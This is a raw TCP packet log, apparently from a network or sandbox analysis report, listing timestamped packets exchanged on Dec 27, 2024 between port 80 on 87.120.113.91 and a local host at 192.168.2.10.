                                                        Dec 27, 2024 14:53:45.002815008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.002923965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.002959967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.003650904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.003731966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.003760099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.004427910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.048542023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.048629999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.048654079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.048957109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.048999071 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.049032927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.049765110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.049802065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.049860001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.050585032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.050617933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.050695896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.051397085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.051430941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.051435947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.052257061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.052293062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.052329063 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.053059101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.053095102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.053169966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.053878069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.053915977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.053997993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.054686069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.054718018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.054795980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.055510044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.055545092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.055613041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.056337118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.056370974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.056438923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.057141066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.057178020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.057252884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.057943106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.057976007 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.058023930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.058868885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.058902025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.058984995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.059607983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.059658051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.059680939 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.060463905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.060498953 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.060580015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.061228991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.061261892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.061397076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.062077999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.062120914 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.062143087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.062890053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.062923908 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.062949896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.063776016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.063812971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.063822031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.064565897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.064598083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.064629078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.065426111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.065458059 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.065474987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.066174030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.066220045 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.066267967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.066956043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.066998959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.169389963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.169481039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.169548035 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.169735909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.169841051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.169878006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.170584917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.170697927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.170734882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.171372890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.185023069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.185060978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.185108900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.185364962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.185405970 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.185425043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.186197042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.186234951 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.186306953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.187050104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.187089920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.187165976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.188028097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.188087940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.188133955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.188771009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.188808918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.188859940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.189640999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.189675093 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.189764023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.190337896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.190370083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.190390110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.191104889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.191147089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.191214085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.192034960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.192069054 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.192148924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.192779064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.192812920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.192846060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.193602085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.193641901 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.193696022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.194379091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.194434881 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.194495916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.195209980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.195245028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.195317984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.196012020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.196049929 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.196170092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.196861982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.196896076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.196947098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.197660923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.197700024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.197729111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.198496103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.198532104 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.198649883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.199364901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.199403048 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.199405909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.200145006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.200182915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.200191975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.200994968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.201036930 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.201066017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.201734066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.201770067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.201843023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.202575922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.202658892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.202682972 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.203412056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.203459024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.203494072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.204204082 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.204251051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.204330921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.205075026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.205113888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.205158949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.205868006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.205879927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.205903053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.249355078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.249988079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.250088930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.250127077 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.250313044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.250415087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.250456095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.251133919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.251231909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.251267910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.252010107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.252034903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.252070904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.252778053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.252943039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.252979040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.253602028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.253720045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.253756046 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.254405022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.254545927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.254581928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.255228996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.255345106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.255388021 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.256068945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.256175041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.256208897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.256880045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.256987095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.257021904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.257698059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.257822990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.257858992 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.258486986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.258598089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.258630037 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.259336948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.259438992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.259475946 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.260196924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.260294914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.260337114 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.260977983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.261095047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.261126995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.261764050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.261879921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.261929035 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.262629032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.262752056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.262788057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.263472080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.263561964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.263598919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.264245033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.264435053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.264477968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.265041113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.265157938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.265192032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.265872955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.265893936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.265927076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.266700029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.266796112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.266832113 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.267502069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.267627954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.267664909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.268291950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.318825006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.370605946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.370670080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.370712996 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.371010065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.371124029 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.371157885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.371829987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.371953964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.371994019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.372623920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.386374950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.386431932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.386441946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.386712074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.386749983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.386837006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.387546062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.387588024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.387645006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.388355017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.388390064 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.388442039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.389202118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.389239073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.389283895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.389998913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.390037060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.390085936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.390794039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.390830040 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.390889883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.391649961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.391699076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.391729116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.392452955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.392486095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.392554998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.393275023 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.393313885 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.393381119 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.394107103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.394140959 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.394188881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.394903898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.394941092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.395036936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.395768881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.395802975 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.395849943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.396564960 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.396596909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.396718979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.397367001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.397406101 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.397464037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.398206949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.398238897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.398282051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.398989916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.399024010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.399097919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.399816036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.399848938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.399909019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.400623083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.400657892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.400706053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.401451111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.401487112 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.401518106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.402801037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.402812958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.402842999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.403448105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.403465033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.403479099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.404007912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.404040098 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.404099941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.404735088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.404767036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.404840946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.405545950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.405580997 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.405649900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.406359911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.406393051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.406461954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.407161951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.407195091 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.407205105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.454109907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.454210043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.454221964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.454471111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.454514027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.454567909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.455272913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.455323935 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.455378056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.456099987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.456136942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.456182957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.456907988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.456948042 CET4972180192.168.2.1087.120.113.91
